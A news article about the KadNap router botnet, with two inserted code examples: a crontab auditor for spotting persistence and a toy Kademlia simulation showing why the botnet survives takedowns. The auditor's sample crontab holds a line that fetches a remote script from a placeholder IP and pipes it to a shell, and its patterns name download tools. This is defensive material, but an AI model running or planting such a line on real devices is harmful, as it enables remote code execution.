14,000 Routers Have Been Infected by Very Tough Malware, Making a Botnet That Is Hard to Shut Down
- Editorial Team

- 10 hours ago

A new malware campaign has infected over 14,000 internet routers around the world, creating a botnet that cybersecurity experts say is very hard to stop. The malware, named KadNap, quietly takes over vulnerable networking devices and makes them part of a large proxy network that cybercriminals use. Researchers say that the way this botnet is set up makes it very hard to take down, and that it shows how dangerous poorly maintained internet infrastructure is becoming.
Finding the KadNap Botnet
Black Lotus Labs, Lumen Technologies' threat intelligence division, found the campaign. Their research showed that KadNap has been spreading since at least August 2025 and has infected thousands of routers and other edge devices that are connected to the internet.
Many of the affected devices are home or small business routers, especially some Asus models. Researchers think, though, that the campaign might not be limited to just one brand or type of device. Routers are especially appealing targets because they connect local networks to the wider internet, which lets attackers manipulate traffic and stay hidden.
KadNap doesn't steal personal files or damage systems; instead, it turns routers into nodes in a large distributed network. After being infected, these devices act as proxy servers, relaying internet traffic for the attackers. This lets hackers hide where they really are and carry out their online activity through the hacked routers.
Researchers think that about 60% of the infected devices are in the US, but infections have also been found in Europe, Asia, and Australia. This malware campaign is likely to be global in scope because it has spread to so many different places. If vulnerable routers aren't patched, it could keep growing.
How the Malware Gets Into Routers
KadNap spreads by taking advantage of security holes in routers that haven't been updated with the latest patches. Many home and small office routers go years without getting firmware updates. This makes them easy targets for attackers who look for old devices on the internet.
Cybercriminals usually use automated scanning tools to find routers with known security holes. After finding a vulnerable device, the attackers run scripts that put the malware on the router.
Most of the time, the infection starts with downloading a malicious script that puts a binary payload on the device. This payload changes the router's system settings and stays on the device for a long time. The attackers set up scheduled tasks that automatically restart the malware processes every time the router reboots to make sure the malware stays active.
Because of this persistence mechanism, restarting the router doesn't get rid of the infection. The malware starts up again every time the device is turned on, so it can stay active for a long time without the user noticing.
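A defender who can export a router's scheduled-task list can screen it for the pattern described above. The following is an added example, not from the original article or from Black Lotus Labs' research: it assumes the scheduler is cron, its heuristics are generic rather than KadNap indicators, and the sample crontab is constructed.

```python
import re

# Generic heuristics for persistence via scheduled tasks (assumed: cron syntax).
# These are not KadNap-specific indicators.
FETCH = re.compile(r"\b(wget|curl|tftp)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|a)?sh\b")
VOLATILE = re.compile(r"(^|[\s;&|])(/tmp|/var/tmp|/dev/shm)/\S+")

def split_entry(line):
    """Return (schedule, command) for a crontab line, or None if it is not a job."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):                      # @reboot, @hourly, ...
        parts = line.split(None, 1)
        return (parts[0], parts[1]) if len(parts) == 2 else None
    parts = line.split(None, 5)
    if len(parts) < 6 or not re.fullmatch(r"[\d*/,\-]+", parts[0]):
        return None                               # e.g. VAR=value lines
    return " ".join(parts[:5]), parts[5]

def audit_crontab(text):
    """Return [(line_number, [reasons])] for entries worth a manual look."""
    findings = []
    for number, line in enumerate(text.splitlines(), 1):
        entry = split_entry(line)
        if entry is None:
            continue
        schedule, command = entry
        reasons = []
        if FETCH.search(command):
            reasons.append("fetches remote content")
        if PIPE_TO_SHELL.search(command):
            reasons.append("pipes into a shell")
        if VOLATILE.search(command):
            reasons.append("runs from a volatile directory")
        if reasons and (schedule == "@reboot" or schedule.startswith("*")):
            reasons.append("re-launched at boot or on a sub-hourly schedule")
        if reasons:
            findings.append((number, reasons))
    return findings

SAMPLE = """\
# constructed example crontab, not taken from an infected device
0 3 * * * /usr/sbin/ntpclient -s
@reboot /tmp/.cache/agent >/dev/null 2>&1
*/10 * * * * wget -q -O - http://192.0.2.10/u.sh | sh
"""
```

Calling `audit_crontab(SAMPLE)` flags the last two entries and leaves the time-sync job alone; a flagged entry is a prompt for manual review, not proof of infection.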
After it is installed, the malware collects basic information about the device, such as its external IP address and how long the system has been running. It also links up with other nodes in the botnet to keep operations in sync and keep the network's communication going.
A Botnet That Can Stand Up to Attacks
The decentralized design of KadNap is one of the most worrisome things about it. In traditional botnets, centralized command-and-control servers send instructions to infected devices. The botnet usually falls apart when police find and shut down those servers.
KadNap, on the other hand, uses a peer-to-peer communication system that is based on a modified version of the Kademlia Distributed Hash Table (DHT) protocol. Instead of having to go through a single command server, this technology lets infected routers talk to each other directly.
In a system like this, where there is no central authority, each infected router helps keep the network running by storing and sharing information about other nodes. The rest of the network can keep working and reconnect on its own even if some devices are removed or disconnected.
This design makes it much harder to break up the botnet. Instead of going after a central control server, investigators would have to find and shut down thousands of infected routers all over the world.
The peer-to-peer system also makes the attackers harder to trace. Researchers have a much harder time finding the source of malicious activity when commands are spread out over many nodes.
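The resilience described in this section can be seen in a toy model of standard Kademlia routing. This is an added example, not code from KadNap or from the researchers; KadNap uses a modified protocol whose details the article does not give, and the ID width, bucket size, bootstrap method and all function names here are assumptions.

```python
import random

BITS, K, ALPHA = 16, 8, 3  # assumed toy values: ID width, bucket size, parallelism

class Node:
    def __init__(self, node_id):
        self.id = node_id
        self.buckets = [[] for _ in range(BITS)]  # bucket i: XOR distance in [2^i, 2^(i+1))

    def learn(self, peer):
        if peer != self.id:
            bucket = self.buckets[(self.id ^ peer).bit_length() - 1]
            if peer not in bucket and len(bucket) < K:
                bucket.append(peer)

    def closest(self, target):
        known = [p for b in self.buckets for p in b]
        return sorted(known, key=lambda p: p ^ target)[:K]

def build_network(size, seed=1):
    rng = random.Random(seed)
    ids = rng.sample(range(1, 2 ** BITS), size)
    nodes = {i: Node(i) for i in ids}
    for node in nodes.values():  # toy bootstrap: each node hears of every peer once
        for peer in rng.sample(ids, size):
            node.learn(peer)
    return nodes

def take_down(nodes, fraction, seed=3):  # survivors keep stale entries for removed peers
    dead = set(random.Random(seed).sample(sorted(nodes), round(len(nodes) * fraction)))
    return {i: n for i, n in nodes.items() if i not in dead}

def lookup(nodes, start, target):  # iterative lookup: ask closest peers for closer ones
    shortlist, asked = set(nodes[start].closest(target)), set()
    while True:
        best = sorted(shortlist, key=lambda p: p ^ target)[:K]
        pending = [p for p in best if p not in asked][:ALPHA]
        if not pending:
            return best[0] if best else None
        for p in pending:
            asked.add(p)
            if p in nodes:
                shortlist.update(nodes[p].closest(target))
            else:
                shortlist.discard(p)  # removed device never replies

def success_rate(nodes, trials=200, seed=2):
    rng, live = random.Random(seed), sorted(nodes)
    pairs = [rng.sample(live, 2) for _ in range(trials)]
    return sum(lookup(nodes, s, t) == t for s, t in pairs) / trials
```

Comparing `success_rate(build_network(300))` with the rate on `take_down(net, 0.3)` shows how much routing survives when 30% of the nodes disappear, even though the survivors' routing tables still point at removed peers. There is no single server whose removal stops lookups, which is why remediation has to happen device by device.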
How Hackers Use the Network
The main goal of the KadNap botnet seems to be to build a big proxy network that hackers can use to send their internet traffic.
Attackers can hide their identity by sending traffic through infected routers, which makes malicious activity look like it is coming from regular home internet connections. As a result, it is much harder for investigators and cybersecurity systems to find the real criminals.
Proxy networks like this one can help with a lot of different kinds of cybercrime. Attackers might use them to commit online fraud, steal data from websites, start cyberattacks, or get around geographic limits on digital services.
Some people also sell these networks as services on underground cybercrime marketplaces. Criminal groups can rent access to thousands of hacked devices, which lets them do illegal things without having to build their own infrastructure.
Why Routers Are Good Targets
Malware developers are targeting routers and other edge networking devices more and more. Smartphones and personal computers often get automatic updates and security checks, but routers are often left alone after they are set up.
Many users go years without updating their router firmware, leaving known security holes open. Some older routers also stop getting security updates from their makers, which means that any flaws that are found can be exploited indefinitely.
Attackers also like routers because they are reliable. These gadgets are usually always connected to the internet, which makes them a stable base for long-term operations.
Attackers can create a huge network that stays active for a long time by compromising thousands of routers. Even if some devices are taken off the botnet, many others keep working, which keeps the network up and running.
Risks for People Who Use the Internet
Although infected routers may continue functioning normally, they can pose serious risks. If a router is hacked, it could be used to relay malicious traffic, which could tie the owner's internet connection to cybercrime.
Distributed denial-of-service (DDoS) attacks can also be done with big botnets. In these attacks, thousands of devices send a lot of traffic to a target website or online service, making it crash or become unavailable.
The rise of router-based botnets shows a bigger problem with internet security than just the immediate threat of cybercrime. As more devices connect to the internet, attackers have more and more vulnerable targets they can use for big operations.
Keeping Malware Away From Routers
Cybersecurity experts say that users can take a number of steps to keep malware from getting into their routers.
First, you should always update your router's firmware to the most recent version that the maker offers. Firmware updates often fix security holes that attackers like to use.
If users don't need them, they should also turn off features like remote management. These features can make routers accessible from the internet, which raises the risk of unauthorized access.
Another important way to protect yourself is to use strong administrative passwords. Many routers get hacked because attackers can easily guess or brute-force weak login information.
Lastly, users should think about getting new routers if their old ones don't get security updates anymore. It's much less likely that modern devices will have unpatched security holes if the manufacturers are still supporting them.
A Growing Worry About Cybersecurity
The KadNap botnet shows how hackers are changing their methods to make bigger and stronger networks of hacked devices. Attackers can build infrastructure that is hard to find and even harder to take down by going after neglected routers and using decentralized communication systems.
Cybersecurity experts say that as more devices connect to the internet, similar campaigns may become more common. Thousands of routers could easily join the next generation of cybercrime botnets if people don't take better care of their devices and use stronger security measures.


